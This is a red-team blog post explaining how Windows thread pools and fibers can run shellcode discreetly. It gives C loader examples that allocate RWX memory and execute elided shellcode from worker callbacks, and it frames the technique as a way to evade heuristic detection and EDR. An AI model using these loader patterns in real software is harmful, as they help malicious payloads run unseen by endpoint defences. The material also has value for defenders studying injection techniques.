Abusing Thread Pools

10-May-2024


Introduction

If you’re a seasoned red teamer, you’re likely familiar with the many process injection techniques, where the goal is to execute code on a compromised system discreetly. Using thread pools in this context is particularly intriguing to me, so I’ll share some insights here.

Typical Process Injection

In this rudimentary example of process injection (into our own process), we allocate executable memory, copy shellcode into it, and create a new thread that executes it.

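#include <windows.h>
#include <string.h>

int main(void) {

	// shellcode bytes (elided)
	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

	// allocate RWX memory, copy the shellcode in, and run it on a new thread
	void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(addr, buf, sizeof(buf));
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL);
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	return 0;
}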

However, this pattern has been used ad infinitum and is likely flagged by most forms of heuristic detection. As a result, there are countless articles describing creative ways around it, which brings us to the topic of thread pools.

What are thread pools and why do they exist?

According to Microsoft’s documentation, a thread pool is a collection of worker threads that execute asynchronous callbacks on behalf of the application. The thread pool is primarily used to reduce the number of application threads and to manage the worker threads.

The thread pool architecture consists of the following:

Worker threads that execute the callback functions
Waiter threads that wait on multiple wait handles
A work queue
A default thread pool for each process
A worker factory that manages the worker threads

For example, if we look at the threads in a newly launched notepad process, we see a number of threads starting at ntdll!TppWorkerThread. These are default thread pool threads, most likely waiting for work.

This is not limited to standard Windows processes; even simple custom applications have them.

If we look at the call stack of one of these thread pool threads, we find the system call ntdll!NtWaitForWorkViaWorkerFactory, which essentially suspends the thread until new work becomes available. According to Microsoft, the number of threads in a thread pool scales up or down depending on the amount of work.

So it turns out we do not have to create a new thread after all. Windows conveniently creates threads that are ready to do work for us, and because these threads are created by the system rather than by our code, using them gives us an element of stealth.

Examples

You could go a hundred different directions with this, but let’s start with a simple example. We create a work object with CreateThreadpoolWork and post it to the thread pool with SubmitThreadpoolWork. A worker thread then calls our callback function, WorkCallback, where the injection occurs.

#include <windows.h>
#include <string.h>

typedef void (*Exec)(void);

VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work){

	// define shellcode (bytes elided)
	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

	// allocate memory
	void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	
	// copy shellcode into allocated memory
	memcpy(addr, buf, sizeof(buf));
	
	// cast shellcode memory into a function pointer and execute
	Exec exec = (Exec)addr;
	exec();
	
	// cleanup
	VirtualFree(addr, 0, MEM_RELEASE);
}

int main(void) {
	// create a work object and post it to the default thread pool
	PTP_WORK TpWork = CreateThreadpoolWork(WorkCallback, NULL, NULL);
	SubmitThreadpoolWork(TpWork);

	// block until the callback has finished
	WaitForThreadpoolWorkCallbacks(TpWork, FALSE);
	CloseThreadpoolWork(TpWork);
	return 0;
}

There’s much to experiment with here. For example, we can convert the worker thread into a fiber and execute the shellcode from a second fiber.

#include <windows.h>
#include <string.h>

typedef void (*Exec)(void);

// fiber start routine: receives the original fiber so it can switch back to it
VOID CALLBACK FiberCallback(LPVOID originalFiber) {
	
	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8.....";

	void* addr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(addr, buf, sizeof(buf));
	Exec exec = (Exec)addr;
	exec();
	
	VirtualFree(addr, 0, MEM_RELEASE);

	// returning from a fiber routine would exit the thread, so switch back instead
	SwitchToFiber(originalFiber);
}


VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work) {
	
	// convert thread to fiber, and set up a new fiber that calls FiberCallback()
	void* originalFiber = ConvertThreadToFiber(NULL);
	void* newFiber = CreateFiber(0, FiberCallback, originalFiber);

	// switch to the new fiber; execution resumes here when FiberCallback() switches back
	SwitchToFiber(newFiber);

	// cleanup: delete the new fiber and turn the worker back into a normal thread
	DeleteFiber(newFiber);
	ConvertFiberToThread();
	
}

int main(void) {
	PTP_WORK TpWork = CreateThreadpoolWork(WorkCallback, NULL, NULL);
	SubmitThreadpoolWork(TpWork);
	WaitForThreadpoolWorkCallbacks(TpWork, FALSE);
	CloseThreadpoolWork(TpWork);
	return 0;
}

There is some interesting research that takes this much further. For example, Alon Leviev’s talk at Black Hat Europe 2023 showed how the architecture and components of thread pools can be abused to bypass EDR with a high degree of success. I strongly recommend giving the accompanying article [^1] a read.

Happy experimenting.

Resources